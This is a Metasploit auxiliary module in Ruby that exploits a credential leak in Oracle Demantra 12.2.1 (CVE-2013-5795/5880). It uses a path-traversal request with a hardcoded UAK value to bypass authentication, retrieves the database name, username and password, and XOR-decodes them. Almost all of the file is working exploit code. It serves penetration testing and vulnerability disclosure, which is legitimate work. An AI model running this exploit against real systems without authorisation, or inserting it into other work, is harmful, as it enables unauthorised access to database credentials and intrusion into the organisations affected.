##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

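class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  # Each integer in the servlet response is XORed with this key to recover one
  # character of the leaked credential string.
  XOR_KEY = 0x50

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Demantra Database Credentials Leak',
      'Description'    => %q{
        This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in
        combination with an authentication bypass. This way an unauthenticated user can retrieve
        the database name, username and password on any vulnerable machine.
      },
      'References'     =>
        [
          [ 'CVE', '2013-5795'],
          [ 'CVE', '2013-5880'],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/'],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/' ]
        ],
      'Author'         =>
        [
          'Oliver Gruskovnjak'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2014-02-28'
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptBool.new('SSL',   [false, 'Use SSL', false])
      ])
  end

  # Scanner entry point: issues the single GET request against one host and
  # prints the decoded credential string when the servlet answers with 200.
  #
  # @param ip [String] target address handed over by the Scanner mixin
  # @return [void]
  def run_host(ip)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('demantra', 'common', 'loginCheck.jsp', '..', '..', 'ServerDetailsServlet'),
      'vars_get' => {
        'UAK' => '406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1'
      }
    })

    # A nil response means the request itself did not complete; `||` instead of
    # `or` so the condition binds as intended inside the `if`.
    if res.nil? || res.body.empty?
      vprint_error("No content retrieved")
      return
    end

    if res.code == 404
      vprint_error("File not found")
      return
    end

    # Any other non-200 status is treated as "not vulnerable / nothing to decode".
    return unless res.code == 200

    body = res.body.to_s
    vprint_status("String received: #{body}") unless body.blank?

    creds = decode_credentials(body)
    print_good("Credentials decoded: #{creds}") unless creds.empty?
  end

  private

  # Turns the servlet body into the leaked credential text.
  #
  # The body is a comma-separated list of decimal integers; each one is XORed
  # with XOR_KEY and taken as a single character. Tokens that do not decode to
  # a byte value (0..255) are skipped instead of letting Integer#chr raise a
  # RangeError and abort the whole scan on an unexpected response.
  #
  # @param body [String] raw HTTP response body
  # @return [String] decoded characters joined together; empty when nothing decoded
  def decode_credentials(body)
    body.split(',')
        .map { |token| token.to_i ^ XOR_KEY }
        .select { |value| value.between?(0, 255) }
        .map(&:chr)
        .join
  end
end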